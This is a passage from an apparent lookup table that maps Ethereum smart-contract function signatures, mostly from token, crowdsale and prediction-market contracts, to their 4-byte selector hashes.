"getRateToPxlAmount(uint256,uint256)": "0x7ca013e6", "clearDistributionDetail()": "0x17916537", "setPurchaseParamCount(uint256)": "0x324cf51a", "approveAndCall(address,uint256,string)": "0x2fe97e3a", "getMarketerAddress(bytes32)": "0x0a9ac3d0", "getMarketerKey()": "0x6cb39448", "episodePurchase(address,uint256)": "0x1097c929", "getContentAddress()": "0x6ad3f723", "getBuyCount()": "0x8f10fd45", "getIsPurchased(address)": "0xc1aa049d", "getPurchasedAmount()": "0x1ec29a5f", "updateEpisode(string,uint256)": "0xda6f76b5", "getEpisodes()": "0xc16f402c", "getMarketerRate()": "0xc713bd70", "getWriter()": "0xd66e5726", "addEpisode(string,uint256)": "0x14081570", "updateContent(string,uint256)": "0x20409b47", "Itterator9000Ultra()": "0xe5a71eb6", "TESTTOKEN1()": "0x76acb968", "createAndEndowD(uint256,uint256)": "0x8dcd64cc", "createD(uint256)": "0x95fe0e65", "D(uint256)": "0x8d949c8b", "LordXChain()": "0x2ba2d714", "receivePriceFromOracle(uint256)": "0x082e6d81", "sendPriceRequestToOracle(bytes16,bytes16)": "0x90754979", "balanceOfDerivative()": "0x8a5be698", "agreedTermination(uint256)": "0x459cb2be", "buyPosition(address)": "0xd3535452", "sellPosition(uint256)": "0x8f0427b1", "reduceStake(uint256)": "0xc3830618", "changeTakerDeadline(uint256)": "0x49465a50", "changeDueDate(uint256)": "0x60aa6b9e", "changeStrikePrice(uint256)": "0x7028875e", "make(bool,uint8,uint256,uint256,bytes16,uint256,uint256)": "0xb6fc1043", "getNumberOfDerivatives()": "0x9a56193b", "createStandardDerivative()": "0x97d11588", "createDerivative(bool,uint8,uint256,uint256,bytes16,uint256,uint256)": "0x802028c9", "getAyantDroitEconomique_Compte_1()": "0x398d3c37", "setAyantDroitEconomique_Compte_1(uint256)": "0x68f8957a", "getTitulaire_Compte_1()": "0x8a69fead", "setTitulaire_Compte_1(uint256)": "0xdbd1df92", "Annexe_SO_DIVA_SAS()": "0x2afbc38f", "LADCoin(uint256,string,string)": "0x3fda417a", "MegaWattContract()": "0xd9eac337", "StarFishCoin()": "0x7b84de4e", "BitcoinpalletToken()": "0x651044a2", "LevelToken()": "0xe14b983e", "refundMany(uint256,uint256)": "0x76aba714", "releaseMany(uint256,uint256)": "0xa3e667b3", "checkOverMaxcap(uint256)": "0xc7a4cf8d", "checkOverExceed(address)": "0x67fe6f0e", "getPurchaseAmount(address)": "0x339ab6f2", "preValidation()": "0x9ba1a7d8", "getKeyLength()": "0xa2177ff0", "PresaleFirst(uint256,uint256,address,address)": "0x4b7a7a14", "showTransferConfigs()": "0xae4aadbb", "showRecastConfigs()": "0xcdb627b2", "showCollectorsBalances()": "0x29bb4bf2", "TokenInformation(address)": "0xfc281217", "read_transfer_config()": "0xe2958974", "read_recast_config()": "0xfe4215f7", "read_demurrage_config_underlying()": "0x493f8d30", "read_collectors_addresses()": "0x3982b10d", "PAYCLECOIN()": "0x0640f885", "MedicoHealthContract()": "0x52eb5751", "LakersvsRockets()": "0x0a0092bf", "TheophanesToken()": "0x9103cfb6", "FreePublicity()": "0x14b546b4", "BTSMToken()": "0x0fe2c5d1", "StupidCoin()": "0x2cca75d3", "Cyberium()": "0x40d815cf", "Vaynix()": "0x854ecd23", "BITNT()": "0x27d6dfbf", "IcoContract(address,address,uint256,uint256,uint256)": "0x979ca729", "IcoToken()": "0x09a00fb1", "getHolders()": "0x5fe8e7cc", "lockupAccount(address,address,uint256)": "0x33d1e5b9", "changeFrozenStatus(address,address,bool)": "0x333f7f70", "issueReserveToken(uint256)": "0x397b90a5", "issueFirstRoundToken()": "0x0a968d5e", "SharderToken()": "0x89077ad2", "addOrUpdateHolder(address)": "0x71a66e7c", "DigiberyToken()": "0x368186ef", "RAXToken()": "0x7b37b6a3", "theCyberGatekeeperTwo()": "0x86845f9a", "SmartOToken()": "0xbdd8f051", "createItem(string,uint256,uint256,uint256[6])": "0xe258a0f0", "QUANTH()": "0xdfafb31d", "getNextIndex(uint8)": "0x1bd2d4cc", "setNewUseIndex()": "0xd6d9266a", "isPointerExpired(uint8)": "0x0045a4d4", "getRequiredPrice()": "0xa6c24b38", "getPointerOwner(uint8)": "0xad0e053b", "getPointer(uint8)": "0xa8834aac", "buyPointer(bytes32,bytes1[64])": "0x1b87945e", "withdrawContract()": "0x9da9df3e", "activateContract()": "0x8fda356d", "MiewGold()": "0x2086ad60", "Jawn()": "0x7b58d7ee", "PATToken(address)": "0x7dd256ff", "ExGirlfriendCoin()": "0x81f86241", "getLargeAmountBonus(uint256)": "0x34bd08c4", "percents(uint256,uint256)": "0xbb911607", "addPercents(uint256,uint256)": "0x38b59be6", "addPrivateInvestor(address,uint256)": "0xd675ecbd", "ESlotsCrowdsale(address)": "0xdbc488e2", "ESlotsICOTokenDeployed(address)": "0x78330101", "issueTokens(uint256,uint256)": "0x54e35ba2", "issueTokensForICO(uint256)": "0xd1ee32c3", "issueTokensForPresale(uint256)": "0xd23f0abb", "issueTokensForPrivateInvestor(uint256)": "0x73dae7d6", "isSoftCapReached()": "0x80d32f85", "allocateReservedTokens(address,uint256)": "0x5185b724", "allocateRemainingTokens(address)": "0x672e20fe", "allocateTokensForTeam()": "0x614939b2", "allocateTokensForFounder()": "0xd128fc20", "changeTeamAddress(address)": "0x3aee69bb", "changePortalAddress(address)": "0x9b30c7db", "changeAdminAddress(address)": "0x1021688f", "deActivate()": "0xff895a62", "setPreSalePrice(uint256)": "0x7d7eee42", "setPrivateSalePrice(uint256)": "0x7bc36e04", "endPreSales()": "0xe5de2925", "startPreSales()": "0x8f0a4c1b", "startPrivateSales()": "0x57257a67", "modifyPrivateList(address[],bool)": "0x7dbc1d6f", "modifyWhiteList(address[],bool)": "0xcadb1166", "loadFund()": "0x01146844", "GreenX(address,address,address)": "0xd4d30bd9", "Owner(address)": "0xa5e220c2", "BrokerNekoNetwork()": "0x45d63b07", "setApplication(address,address)": "0x2d5134f7", "withdraw(address,address,uint256,uint256,address)": "0xf52bbc2d", "CL()": "0x36d0288c", "Photos()": "0xd93ef85f", "disableICO()": "0x666b7d32", "DABcoin()": "0xbc11f72c", "compareAndApprove(address,uint256,uint256)": "0x751e1079", "migrationInfoSetter()": "0x5271309f", "note()": "0x26d111f5", "changeMigrationInfoSetter(address)": "0x0bffa8b4", "migrationInfo()": "0x08f978c6", "callDefaultAction()": "0x6d295e24", "delayDefaultAction()": "0x4585ad02", "setRecipientString(string,string)": "0x37548549", "setPayerString(string,string)": "0x15eec1b6", "internalRelease(uint256)": "0xef464e19", "internalBurn(uint256)": "0x56d2ec1b", "recoverFunds()": "0xb79550be", "getFullState()": "0x972161f7", "checkInvariant()": "0xe79487da", "deployContract()": "0x6cd5c39b", "PassHasBeenSet(bytes32)": "0x31fd725a", "SetPass(bytes32)": "0x0a6fbb05", "upperBound()": "0xb09ad8a0", "SHORT()": "0xa871da91", "lowerBound()": "0xa384d6ff", "OUTCOME_RANGE()": "0x6e5452fe", "LONG()": "0x561cce0a", "getOutcomeTokens()": "0xf21a1468", "getEventHash()": "0xe96e5950", "redeemWinnings()": "0xad0b2bec", "outcomeTokens(uint256)": "0x8abe59ea", "getOutcomeCount()": "0x7dc8f086", "sellAllOutcomes(uint256)": "0x6fb1edcd", "getOutcomeTokenDistribution(address)": "0x69c19d4c", "buyAllOutcomes(uint256)": "0x28da850b", "setOutcome()": "0x0537665d", "pwn()": "0xdd365b8b", "checkHasilBet(address)": "0xa89171e3", "betGanjilGenap(bool)": "0x8a252194", "admin()": "0xf851a440", "downloadPriceInWei()": "0xf7701b47", "BOARD_1()": "0xf267035f", "USDSTEMPRICE()": "0xe80d47dd", "transferCount()": "0xe3d33fc9", "shares(bytes32,bytes32)": "0xe347a773", "BOARD_2()": "0xda60d7e8", "purchase(bytes32)": "0xcc445611", "ownersCount()": "0xb9488546", "txLog(uint256)": "0x977eda79", "TOTALSHARES()": "0x83db0680", "transferRightIfApproved(address,bytes32)": "0x7fa28d75", "oracle()": "0x7dc0d1d0", "stemPriceInWei()": "0x6695b592", "priceLastUpdated()": "0x52aaead8", "BLOCKAPPS()": "0x44fddeb7", "transferLog(uint256)": "0x436da5fe", "txCount()": "0x3c540687", "usdEthPrice()": "0x1e9be6a1", "BOARD_3()": "0x11851b5e", "USDDOWNLOADPRICE()": "0x0cbe1eb8", "owners(uint256)": "0x025e7c27", "getAllChildIds(bytes32)": "0x1733043f", "getAllParentIds(bytes32)": "0xdcf946c2", "getItem(bytes32)": "0xaa0372e7", "_getAllChildIds(bytes32)": "0xeca85419", "_getAllParentIds(bytes32)": "0x059417da", "_addItemToParent(bytes32,bytes32)": "0x5de4381b", "getChildId(bytes32,uint256)": "0xb4a39dfd", "getParentId(bytes32,uint256)": "0x91e8609f", "createUltimateOracle(address,address,uint8,uint256,uint256,uint256)": "0xce70faec", "voteForOutcome(int256,uint256)": "0xf7553098", "challengePeriod()": "0xf3f480d9", "spreadMultiplier()": "0xd84d2a47", "outcomeAmounts(address,int256)": "0xc427af9b", "collateralToken()": "0xb2016bd4", "challengeOutcome(int256)": "0x9f0de490", "isChallenged()": "0x9df4d0fe", "challengeAmount()": "0x9d89e7d4", "forwardedOutcome()": "0x984a470a", "frontRunnerSetTimestamp()": "0x8ef8125e", "setForwardedOutcome()": "0x739b8c48", "isChallengePeriodOver()": "0x72b8de14", "forwardedOutcomeSetTimestamp()": "0x466ae314", "totalOutcomeAmounts(int256)": "0x1ff14311", "isFrontRunnerPeriodOver()": "0x1a4f5b67", "totalAmount()": "0x1a39d8ef", "frontRunner()": "0x0f3e9438", "frontRunnerPeriod()": "0x0853f7eb", "forwardedOracle()": "0x061a85c7", "issue(address[],uint256)": "0x42958b54", "createMarket(address,address,uint24)": "0x7abeb6a0", "revoke(address,uint256)": "0xeac449d9", "createCategoricalEvent(address,address,uint8)": "0x9df0c176", "scalarEvents(bytes32)": "0x9897e8a5", "categoricalEvents(bytes32)": "0x8d1d2c21", "createScalarEvent(address,address,int256,int256)": "0x5ea194a3", "createCentralizedOracle(bytes)": "0x4e2f220c", "isOutcomeSet()": "0xccdf68f3", "isSet()": "0xc65fb380", "ipfsHash()": "0xc623674f", "getOutcome()": "0x7e7e4b47", "setOutcome(int256)": "0x717a195a", "outcome()": "0x27793f87", "FEE_RANGE()": "0xfbde47f6", "buy(uint8,uint256,uint256)": "0xf6d956df", "payoutfordividend(address,uint256)": "0x285a9b32", "claimfordividend()": "0x3cfe6731", "removeAddressFromAdmin(address)": "0xef0a14f8", "addAddressToAdmin(address)": "0x6226d4b2", "removeAddressFromMaster(address)": "0xcdaeb47d", "addAddressToMaster(address)": "0x1a79bbef", "FrancevsArgentina()": "0x37714274", "AICH()": "0x52f59e0e", "pokerbox(uint256,uint256)": "0x36d22de7", "VerifyAccount(address,bool)": "0x872519cd", "needVerifiedAccount(bool)": "0x30ff2ad5", "freezeAccountSend(address,bool)": "0x052f7d11", "transferLog(address,uint256,string)": "0x5b66cc84", "LTT()": "0xf6626856", "getMarriageDetails()": "0x9d3ec1a7", "ringBell()": "0xd1df1252", "getDeployedMarriages()": "0xcc64cfcb", "createMarriage(string,string,string,string,uint256)": "0xbd83ea8d", "LEU(address,uint256)": "0x9f454f2b", "JACK(string,string,uint8,uint256)": "0x6f796d86", "pauseCrowdSale(bool)": "0x2d9240f3", "terminateCrowdSale()": "0x2469a846", "GTokenContract(uint256,string,string)": "0x8e417b30", "AUCC()": "0x25464902", "AFROIN()": "0xaef3fa6c", "_destroy(address,uint256)": "0xcdc07bbc", "tryClose()": "0x9a7b5b7b", "updateWinnerBid(bool,bytes,uint256,bytes,bytes,bytes)": "0x2ab22592", "releaseFor(address,uint256)": "0xbeb96be5", "changeBeneficiary(uint256,address)": "0xb0070a30", "getTokenTimelockDetails(address,uint256)": "0x34c6a9ae", "getTokenTimelockCount(address)": "0x2ce7900b", "revokeTokenTimelock(address,uint256)": "0xd290ee06", "createTeamTokenTimeLock(address,uint256,uint256,address)": "0x73f58acd", "createInvestorTokenTimeLock(address,uint256,uint256,address)": "0x68b91201", "SpainvsRussia()": "0xc057b40d", "ZYHToken()": "0xbaec25ee", "retrievePoolFee(uint256)": "0xea2f9ebe", "settleCandyGetx(uint256)": "0xb911f2fb", "settleEtherPolicy(address[],uint256[],uint256[],uint256[])": "0x4abe1a62", "updateAgent(address)": "0x49f41a42", "joinWithCandy(address,uint256,uint256)": "0xa4dbbbf1", "executeProposal(uint256,uint256,uint256)": "0x986cc311", "newProposal(uint256,address,uint256,string)": "0x79644576", "withdrawPolicy(uint256,uint256,uint256,address)": "0x9b173d57", "getx2Policy(address,uint256,uint256,uint256)": "0xe906e664", "addPolicy(uint256,uint256)": "0xa0d121a9", "joinSinceOf(uint256)": "0xf7996163", "accumulatedBalanceOf(uint256)": "0x8439f80d", "policyID(uint256)": "0x85d3b5bd", "PolicyPool(address)": "0x612ff19e", "electrolightTestnet()": "0x1ba8ef21", "batchOrderTrade(uint8[2][],bytes32[4][],uint256[8][],address[6][])": "0x78f76779", "trade(uint8[2],bytes32[4],uint256[8],address[6])": "0xd3057859", "CloseDonation()": "0x6d40ee41", "startDonation()": "0xbcabbfb1", "PYCToken()": "0x766b1818", "IDD()": "0x2858507f", "OTM()": "0x73e87d74", "AGC(uint256,string,string)": "0xea03918c", "GreenEarthEconomyFund()": "0xf7f6d4da", "BCBCOIN(uint256,string,string)": "0xb51abfcd", "idx()": "0x795dbede", "BrokerBank(address,uint256,address,address)": "0x19e82e6f", "getHash2(address,bytes32)": "0xafde86c1", "getHash1(uint8[5],uint8,bytes32)": "0x841302ce", "uint8ToString(uint8)": "0x2e46ed94", "batchTransfer2(address[],uint256[])": "0xa28103f2", "batchTransfer1(address[],uint256)": "0x2ca0d7ca", "_withdrawEther(address)": "0x8d55719e", "withdrawEtherTo(address)": "0x07fa40e4", "EtherTool()": "0x13019a5e", "uintToBytes32(uint256)": "0x886d3db9", "numToString(uint256)": "0x05674427", "appendNumToString(string,uint256)": "0xfd0801c1", "payoutPartial(uint256)": "0x798ce54f", "_createExoplanet(string,address,uint256,uint32,string,uint32,uint8,string)": "0x6e241c5c", "approved(address,uint256)": "0xc1448284", "addressNotNull(address)": "0x4ede23c8", "transferUnownedPlanet(address,uint256)": "0xb629d741", "getExoplanet(uint256)": "0x06d91eea", "setScientificData(uint256,string)": "0xf6e5e298", "setPriceInExoTokens(uint256,uint32)": "0xe2f77ae2", "setPriceInEth(uint256,uint256)": "0xbf8edd85", "setTechBonus3(uint256,string)": "0xafe1d4cf", "setTechBonus2(uint256,string)": "0xad50039f", "setTechBonus1(uint256,string)": "0x6d25ba1d", "getScientificData(uint256)": "0xd6c5d823", "getTechBonus3(uint256)": "0xccdaeab0", "getTechBonus2(uint256)": "0x2f0ddcb2", "getTechBonus1(uint256)": "0xf4ae0d2f", "getCryptoMatch(uint256)": "0xcbe7a150", "getNumOfTokensBonusOnPurchase(uint256)": "0xb3ef774b", "getLifeRate(uint256)": "0x7ffc0712", "getPriceInExoTokens(uint256)": "0xa594056f", "createContractExoplanet(string,uint256,uint32,string,uint32,uint8,string)": "0x1d8b4dd1", "ExoplanetToken()": "0x5181500d", "setPresaleMode(bool)": "0xb8a25119", "BitkerToken()": "0x8dfa703f", "ETFT(uint256,string,string)": "0x0a15d3a8", "Test2(address)": "0x0cf838e1", "Test1(int256)": "0x55dfb430", "USDToken()": "0x86c59418", "aprovarUsuario(address,uint256)": "0xf398dc28", "retirarDividendos()": "0x3446bac4", "depositarLucro()": "0x197a2820", "transferirSalaDePara(address,address,uint256)": "0x8e0488a8", "transferirSala(address,uint256)": "0x5f9c84b5", "comprarSala()": "0x5c9b62b4", "BrokenContract()": "0xbf06444b", "canExecuteArbitraryCode()": "0xbf742d56", "executeCode(bytes)": "0x3144c859", "SuperContract()": "0x238604f0", "addressForNonce(uint8)": "0x21105d35", "identifierHash(string)": "0x214962d1", "deploy(string)": "0xc7602316", "uploadCode(string,bytes)": "0x36751a6b", "transferMoneyMoney(address,uint256)": "0x10d3bd2a", "deployCode(bytes)": "0xd4616967", "medicos()": "0x86a61c81", "_processRefund(address,uint256)": "0x75ad4787", "setminContribution(uint256)": "0x7914d10f", "setmaxContribution(uint256)": "0x0ace9469", "Kayako()": "0x4dd7f293", "bittravelxToken()": "0x7d7a3a1a", "TwoFucksToken()": "0xd9710278", "howMuchWithdrawed()": "0x7f582b47", "widthdraw(uint256)": "0xe0da260c", "batchFreezeAccount(address[],bool)": "0x88c8475c", "setAirdropToken(uint256)": "0x46ed24a3", "KiemTra(uint256)": "0x8b699fbb", "_DemSinhVienDat()": "0x403e73ea", "deapprove()": "0x486201ab", "DeleteAllRequests()": "0x4f7035b4", "DemSinhVienRequests()": "0x37ae31c7", "DemSoKhoaHoc()": "0x357be177", "ThemKhoaHoc(string,uint256,string,string,string,string)": "0x122bdc32", "syp1(address)": "0x863f40ac", "TestyToken()": "0xe828a293", "isCloseable()": "0x7a00cf46", "terminateShortPosition()": "0x145ff9cb", "transferTokensToParticipants(uint256,uint256,uint256,uint256,address)": "0xc5546ecd", "calculateAdminFee(uint256)": "0xbdaacbbe", "calculateLoanerInterest(uint256)": "0xdde6b340", "convertTokens(address,address,uint256,uint256)": "0x04684ba3", "setUnderCollaterizedPosition()": "0xd120a4f2", "closeUndercollaterizedPosition()": "0x68533a1d", "changeFisherMansFeeCalculator(address)": "0x48ddc01f", "setShortPositionExpired()": "0xb1cc38d0", "isShortPositionExpired()": "0x648a5903", "calculateFishermansFee()": "0x4d729be4", "closeShortPosition()": "0xf97b65da", "fillFromCollateral(uint256)": "0xac377553", "calculateRequiredFillingAmount(uint256)": "0x6747830d", "convertShortedTokensToLiquidationToken(uint256)": "0xd24f8a17", "getExpectedMinReturn(address,address,uint256)": "0x612d6061", "addCollateral(uint256)": "0xbcc46e83", "replaceShorter()": "0x259c29e8", "approveNewShorter(address)": "0xaabbd0ce", "getShortPositionState()": "0x5ab0e470", "newShortPosition(address[7],uint256[4],uint32[3])": "0x3fd2799d", "swapTokenToToken(address,uint256,address,uint256)": "0x7409e2eb", "GetMyBalance()": "0x022b9735", "GetBetInformation(uint256)": "0xe672eb49", "GetAllBetIDs()": "0x343f3acb", "GetChallengeInformation(uint256)": "0x484f5a61", "GetAllChallengeIDs()": "0x10f6fd02", "GetCurrencyInformation(uint256)": "0x765f09f2", "GetAllCurrencyIDs()": "0x2a7f26c4", "RedeemTokens(uint256)": "0x6655d7dd", "AddNewCurrency(string,string,string,string)": "0x54b6ed85", "PlaceBet(address,uint256,uint256,bool)": "0x31e9ea8a", "AddNewChallenge(uint256,uint256,uint256,uint256,bool)": "0xf95fe2e7", "ScheduleTransaction(string,uint256,uint256)": "0xe85dcfe8", "ConcludeChallenge(uint256,string)": "0xe83dfe5a", "Setup(address,address)": "0x7b9f87d3", "YeojinToken()": "0x1e28ba20", "AKMJCHAIN()": "0x7e4f1a9f", "get_Release()": "0xc73aae86", "ETGTestCoin()": "0x4b5243b5", "getImplementation(string,string)": "0x27a0d669", "hasVersion(string)": "0xeb0a70c1", "getVersion(string)": "0x3ab50a9c", "createAndCall(string,bytes)": "0xe1caa0c7", "getImplementation(string)": "0x6b683896", "isClaimable(string)": "0x7a442a9b", "NetyulCrowdsale(address,uint256,uint256,uint256,address,address)": "0xb84b05b2", "bb()": "0x0a9ae69d", "YDMediaToken()": "0x5ef6543c", "setStartingTokensAmount(uint256)": "0xfe52ee70", "weiRaisedAfterDiscountRounds()": "0xf7e28f8b", "tokensRaisedDuringRound(uint8)": "0x5d1ce03f", "weiRaisedDuringRound(uint8)": "0x585bc25b", "hardCapETHInWeiValue()": "0x5676d075", "peggedETHUSD()": "0x5cdc9eda", "pegETHUSD(uint256)": "0xc3146814", "setReservedTokens(uint256)": "0x027903ef", "determineDiscountTranche()": "0x0a0279f8", "LOCIcoin(uint256,string)": "0xa5ff2551", "status(address,address)": "0x2f0e3a6c", "executeTransfer(string,string,uint256,uint256)": "0x6b5aed93", "initiateTransfer(string,string,uint256,uint256)": "0xe509b9a0", "getTransfer(string,uint256)": "0x59aa80b8", "getBalance(string)": "0x3a51d246", "RuralBank(uint256,address[])": "0x82d82983", "debit(string,uint256)": "0xf9eba935", "credit(string,uint256)": "0x8d84a7fd", "Foo()": "0xbfb4ebcf", "getTotalBonded()": "0x5c50c356", "isRegisteredTranscoder(address)": "0x68ba170c", "activeTranscoderTotalStake(address,uint256)": "0xf2083220", "transcoderTotalStake(address)": "0x9ef9df94", "electActiveTranscoder(uint256,bytes32,uint256)": "0x91fdf6b1", "slashTranscoder(address,address,uint256,uint256)": "0x22bf9d7c", "updateTranscoderWithFees(address,uint256,uint256)": "0x3aeb512c", "setActiveTranscoders()": "0x242ed69f", "isPaused()": "0xb187bd26", "setPause(bool)": "0xbedb86fb", "Pausable()": "0x2c6fa84c", "testFailTransferOnlyTrustedCaller()": "0x65c91b0b", "testApproveWillNotModifyAllowance()": "0x02d19fe5", "testApproveWillModifyAllowance()": "0xff178834", "testMoveWithTrust()": "0x1b346a63", "testFailMoveWithoutTrust()": "0x2b79d7ba", "testPullWithTrust()": "0x3e093f38", "testFailPullWithoutTrust()": "0x16a11ae5", "testTrustedTransferFrom()": "0xb9776301", "testTrusting()": "0xa8ef6edd", "testFailUntrustedTransferFrom()": "0x543e4dcd", "testFailSetName()": "0xbedc17ea", "testSetName()": "0x91e59bcf", "testFailTrustWhenStopped()": "0x0cd9aec6", "testFailBurnWhenStopped()": "0xaaaea138", "testFailMintGuyWhenStopped(int256)": "0xe004feb0", "testFailMintWhenStopped(int256)": "0x86591bd6", "testFailMoveWhenStopped()": "0x361a5468", "testFailPullWhenStopped()": "0x11831234", "testFailPushWhenStopped()": "0xbcb02b74", "testFailTransferFromWhenStopped()": "0x31fea236", "testFailTransferWhenStopped()": "0x5ebca187", "testBurnGuyAuth()": "0x3ee58d13", "testFailBurnGuyNoAuth()": "0x8940afe7", "testBurnAuth()": "0x0dc7bd07", "testFailBurnNoAuth()": "0xccb1cbbc", "testBurnGuyWithTrust()": "0x7f5d85f8", "testFailBurnGuyWithoutTrust()": "0xde9364f4", "testBurnThis()": "0x7663f228", "testBurn()": "0xe13aba48", "testMintGuyAuth(int256)": "0x7d886976", "testFailMintGuyNoAuth(int256)": "0x46b5d107", "testMintAuth(int256)": "0xff21984a", "testFailMintNoAuth(int256)": "0xf0446e02", "testMintGuy(int256)": "0xf29fe77e", "testMintThis(int256)": "0xdb9b6775", "testMint(int256)": "0x01b9fe59", "doMint(int256,address,uint256)": "0x290c8eb1", "doBurn(uint256)": "0x8d7570fc", "doMint(int256,uint256)": "0x52447ad2", "doMove(address,address,uint256)": "0xc2e0af44", "doPull(address,uint256)": "0x51356817", "doPush(address,uint256)": "0x9d1f2800", "doApprove(address)": "0x7512071b", "doSetName(bytes32)": "0xde05905b", "getAsAddress(bytes32)": "0x79f57e68", "getAsAddressOrZero(bytes32)": "0xd8e5e64e", "addAsAddress(bytes32,address)": "0x3f836dcf", "contains(bytes32)": "0x1d1a696d", "getValueOrZero(bytes32)": "0x8196b8c7", "add(bytes32,bytes32)": "0xd1de592a", "AEToken()": "0xc83a7e94", "destroy(address)": "0x00f55d9d", "PreminedAsset()": "0x6e880e4d", "TruCrowdSale(uint256,uint256,address,address,uint256,uint256)": "0xf5b01fd7", "mintFeeTokens(int256,uint256)": "0xac8648a2", "redeemForReportingParticipant()": "0xb97a6c12", "getFeeToken()": "0xca709a25", "onBurn(address,uint256)": "0x45a1b92c", "onMint(int256,address,uint256)": "0xce5968da", "onMarketFinalized()": "0x8dc6e2f1", "noteInitialReportingGasPrice()": "0x31a97ff0", "increaseTotalWinningStake(uint256)": "0xb1c3c97e", "increaseTotalStake(uint256)": "0x76745dbb", "isOver()": "0xb4bd9e27", "isReportingActive()": "0x16694dd9", "isDisputeActive()": "0xf03e5de5", "isForkingMarketFinalized()": "0xd9d34ce1", "migrateFeesDueToFork()": "0x3791759c", "allMarketsFinalized()": "0xb2f3ded4", "getNumDesignatedReportNoShows()": "0xda0b0c36", "getAvgReportingGasPrice()": "0x2ff7a81f", "getNumIncorrectDesignatedReportMarkets()": "0xa52c0512", "getNumInvalidMarkets()": "0xcf3d3849", "getNumMarkets()": "0x295c39a5", "getUniverse()": "0x870c426d", "updateMarketPhase()": "0x1242e96d", "noteDesignatedReport()": "0xae01dd06", "removeMarket()": "0x0c3dbf43", "migrateMarketInFromNibling()": "0xe119f8bb", "migrateMarketInFromSibling()": "0xce4150eb", "getCollectReporterAddress()": "0x120c5194", "mintAllocations()": "0x4198d24a", "sendBatchCS(address[],uint256[])": "0x9c1d9790", "setWhiteLister(address)": "0x9576bfbd", "removeWhiteListed(address)": "0xef125360", "addWhiteListed(address[])": "0xaa64f3c6", "setFundingBlock(uint256,uint256,uint256)": "0x2a8219e2", "setCrcWithdrawAccount(address)": "0x2e5b02ae", "setEtherProceedsAccount(address)": "0xac7e1e0a", "getCrcWithdrawAccount()": "0xb51f86c0", "getEtherProceedsAccount()": "0x53515226", "getCurrentBlockNum()": "0x89ff7fe0", "communityContributionWithdraw(uint256)": "0xe82ed40c", "teamKeepingWithdraw(uint256)": "0x5066e2bd", "icoPlatformWithdraw(uint256)": "0xc114301c", "processPrivateFunding(address)": "0xb07a6735", "processEthPulicFunding(address)": "0xca5adadc", "CRCToken()": "0x76c70431", "transfer(address,address[],uint256)": "0x5106b8fe", "removeBalances(address[],uint256[])": "0x56451bc2", "sendTokensToSeven(address,address,address,address,address,address,address,uint256)": "0x01769b37", "sendTokensToFive(address,address,address,address,address,uint256)": "0xb01d7a11", "sendTokensToTwo(address,address,uint256)": "0x1fb2de2c", "sendTokensToOne(address,uint256)": "0xbbe86e6a", "setBalances(address[],uint256[])": "0xb7e39b4f", "AirDropRedeemAFTK()": "0x13767204", "F2UPhone()": "0x99e487a9", "HKDHToken(uint256,string,string)": "0x25161e70", "Defapacoin()": "0x9da32c14", "NCU(uint256,string,string)": "0x797b5877", "ZJLToken()": "0x74e4f31d", "setCrowdsaleContract(address)": "0x6596cff3", "LuckyToken()": "0x6cf843ac", "ProWalletToken()": "0xfc5faa82", "OrcERC20()": "0x936bfc63", "AllocateFounderTokens()": "0xfc7d07ce", "BuyTokens()": "0xd81111ab", "remainingCapInEth()": "0x92549366", "amountRaisedInEth()": "0x8132581c", "fundingMinInEth()": "0xa4f28bdd", "fundingMaxInEth()": "0x0c68a104", "ContractTST()": "0xb9a2131b", "setITO(address)": "0xab5fa2c6", "setPreITO(address)": "0xca392c49", "claimUnsoldCoins()": "0x0e2d27cd", "TrueVeganCoinPresale()": "0x411dddb2", "TrueVeganCoin()": "0x72ca7fce", "pank13()": "0x248e4dd4", "ECryptoToken()": "0xc8830ddf", "testDAO()": "0x773e8b0f", "test1()": "0x6b59084d", "toUint(bytes32)": "0x6893cc22", "EMACCrowdsale(uint256,uint256,uint256,address)": "0xf3a3de38", "EMACToken(uint256)": "0x2dba9e63", "burnToken(address,uint256)": "0xd1df306c", "setAnimalMeta(uint256,string)": "0x7cd7c2bd", "sendToken(address,uint256,string)": "0x7dce4595", "getTotalTokensAgainstAddress(address)": "0x6c609906", "getAnimalIdAgainstAddress(address)": "0x9b46461e", "KKToken()": "0x5a5d3350", "Awards(uint256)": "0x2362b26d", "sendtoC(uint256)": "0xb249bf01", "sendtoB(uint256)": "0xe3ca12c6", "sendtoA(uint256)": "0x2fdadc21", "getNowTotal()": "0x295a1cc2", "getresult(uint256)": "0xd1b878e9", "nowperiod()": "0x511b445b", "getperiodlasttime(address,address)": "0x919acf1e", "setsymbol(string)": "0x11f29729", "setAirdropAmount(uint256)": "0xa5500c30", "updateDocument(uint256,uint256)": "0x3294c2d7", "getDocumentIdWithName(string)": "0x23e798e6", "getDocumentIdWithIPFSdirectoryHash(string)": "0xd5d5f469", "getDocumentIdWithContentHash(string)": "0xd59b5d4e", "getFirstDocumentIdBetweenDatesValidFrom(uint256,uint256)": "0x262006e9", "getFirstDocumentIdStartingAtValidFrom(uint256)": "0x4da5160f", "setBaseUrl(string)": "0xc7c3268b", "getBaseUrl()": "0x0ac96103", "getDocumentUpdatedVersionId(uint256)": "0x49776581", "retire(address)": "0x9e6371ba", "getDocumentsCount()": "0x0bcf963b", "addDocument(string,string,string,string,uint256,uint256)": "0x90df44b4", "getContestStatusForDateAdmin(uint32)": "0x44ec1a0d", "getEntryStatus(address,uint32)": "0x5adcba0e", "getUsersForDate(uint32)": "0x83aec57c", "getDatesForUser(address)": "0xea5815f5", "calculateOperationFee(uint32)": "0x3073ef42", "calculateBonus(uint32)": "0xd175d38d", "getLastRegisterDate()": "0x5d2b811d", "getDate(uint32)": "0xb3ee7248", "getNextDate(uint32)": "0x54bbd376", "getContestStatusForDate(uint32)": "0x813fdec8", "getWithdrawableOperationFeeDatesAndAmount()": "0xb060b785", "withdrawOperationFees(uint32[])": "0x8aae1f50", "getUserEntryStatuses()": "0xca1149d1", "getWithdrawableDates()": "0x00cb41e3", "calculateWithdrawableAmount()": "0x64f05fd7", "withdraw(uint32[])": "0x2d817a91", "register(uint32)": "0x130d7906", "Habits()": "0x47f61a47", "EthMark()": "0xc6ff3ae3", "gameGiftUserDayTimes()": "0x502a86bf", "aiurExchangeOracle()": "0x7de480c6", "ICORunning()": "0xc3fbc632", "checkNumber()": "0x4758b9cd", "CPCEPrivateDeposit()": "0x087ce940", "isInPresalePhase()": "0xf96c166c", "STARTING_SHRIMP()": "0xfb05594f", "tokensContract()": "0x7518fa98", "buyRegistration()": "0xe4007949", "isAllocated()": "0x006c81d3", "fundingMaximumTargetInWei()": "0xaa367664", "coolHero()": "0xd9c76d61", "MIN_ACCEPTED_VALUE()": "0xd6ad5e5e", "destroyEnabled()": 